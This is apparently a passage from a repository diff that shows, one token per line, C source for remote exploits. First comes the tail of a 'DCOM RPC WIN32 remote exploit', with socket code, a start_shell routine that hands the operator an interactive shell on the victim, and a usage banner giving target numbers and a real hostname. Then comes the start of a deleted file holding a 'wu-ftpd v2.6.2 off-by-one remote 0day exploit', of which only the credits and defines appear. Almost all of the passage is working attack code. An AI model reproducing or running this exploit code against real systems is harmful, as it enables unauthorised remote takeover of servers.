(
" [-] socket() error"
);
return
(
-
1
);
}
sxp_addr
.
sin_family
=
AF_INET
;
sxp_addr
.
sin_port
=
htons
(
conn_port_nm
);
sxp_addr
.
sin_addr
=*
((
struct
in_addr
*
)
sxp
->
h_addr
);
bzero
(
&
(
sxp_addr
.
sin_zero
),
8
);
if
(
connect
(
sock
,(
struct
sockaddr
*
)
&
sxp_addr
,
sizeof
(
struct
sockaddr
))
==-
1
)
{
perror
(
" [-] connect() error"
);
return
(
-
1
);
}
return
(
sock
);
}
void
start_shell
(
int
st_sock_va
)
{
int
died
;
char
*
command
=
"cd C:
\\
& echo Wow, are u hacker now ?!
\n
"
;
char
readbuf
[(
GET_SZ
)];
fd_set
rset
;
memset
((
char
*
)
readbuf
,
0
,
sizeof
(
readbuf
));
fprintf
(
stdout
,
" [!] Executed shell successfully !
\n\n
"
);
send
(
st_sock_va
,
command
,
strlen
(
command
),
0
);
for
(;;)
{
fflush
(
stdout
);
FD_ZERO
(
&
rset
);
FD_SET
(
st_sock_va
,
&
rset
);
FD_SET
(
STDIN_FILENO
,
&
rset
);
select
(
st_sock_va
+
1
,
&
rset
,
NULL
,
NULL
,
NULL
);
if
(
FD_ISSET
(
st_sock_va
,
&
rset
))
{
died
=
read
(
st_sock_va
,
readbuf
,
sizeof
(
readbuf
)
-
1
);
if
(
died
<=
0
)
exit
(
0
);
readbuf
[
died
]
=
0
;
fprintf
(
stdout
,
"%s"
,
readbuf
);
}
if
(
FD_ISSET
(
STDIN_FILENO
,
&
rset
))
{
died
=
read
(
STDIN_FILENO
,
readbuf
,
sizeof
(
readbuf
)
-
1
);
if
(
died
>
0
)
{
readbuf
[
died
]
=
0
;
write
(
st_sock_va
,
readbuf
,
died
);
}
}
}
return
;
}
void
re_connt_lm
(
int
st_sock_va
)
{
if
(
st_sock_va
==-
1
)
{
fprintf
(
stdout
,
" [-] Failed.
\n\n
"
);
fprintf
(
stdout
,
" Happy Exploit ! :-)
\n\n
"
);
exit
(
-
1
);
}
}
void
pri_usg
(
char
*
f_nm
)
{
int
r_rn
=
0
;
fprintf
(
stdout
,
" Usage: %s -option [argument]
\n\n
"
,
f_nm
);
fprintf
(
stdout
,
"
\t
-h [hostname] - target host.
\n
"
);
fprintf
(
stdout
,
"
\t
-t [number] - select target number.
\n\n
"
);
fprintf
(
stdout
,
" Select target number>
\n\n
"
);
for
(;;)
{
if
(
__pt_pkg_form
[
r_rn
].
op_pk_num
==
(
0x82
))
break
;
else
{
fprintf
(
stdout
,
"
\t
{%d} %s
\n
"
,
__pt_pkg_form
[
r_rn
].
op_pk_num
,
__pt_pkg_form
[
r_rn
].
op_pk_str
);
}
r_rn
++
;
}
fprintf
(
stdout
,
"
\n
Exmaple> %s -h korea.microsoft.com -t3
\n\n
"
,
f_nm
);
exit
(
0
);
}
void
pri_banrl
()
{
fprintf
(
stdout
,
"
\n
DCOM RPC WIN32 remote exploit (Most languages)
\n\n
"
);
}
/* eox */
tools/0x82-wu262.c
deleted
100755 → 0
/*
**
** wu-ftpd v2.6.2 off-by-one remote 0day exploit.
** Public version - 2003/08/02
**
** --
** This vulnerability was discovered by Wojciech Purczynski <cliph@isec.pl>,
** Janusz Niewiadomski <funkysh@isec.pl>.
** They offered excellent Advisory, I'm thankful to them.
**
** URL: http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** More useful version isn't going to share. (various test version)
** For reference, exploit method that use `STOR' command succeeded. :-)
**
** Update: August 2, I added wu-ftpd-2.6.2, 2.6.0, 2.6.1 finally.
** August 3, Brute-Force function addition.
** --
** Thank you.
**
*/
#define VERSION "v0.0.3"
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEBUG_NG
#undef DEBUG_NG
#define NRL 0
#define SCS 1
#define FAD (-1)
#define MAX_BF (16)
#define BF_LSZ (0x100)
/* 256 */
#define DEF_VA 255
#define DEF_PORT 21
#define DEF_ANSH 11
#define GET_HOST_NM_ERR (NULL)
#define SIN_ZR_SIZE 8
#define DEF_ALIGN 4
#define GET_R 5000
#define DEF_NOP 64
#define DEF_STR "x0x"
#define HOME_DIR "/home/"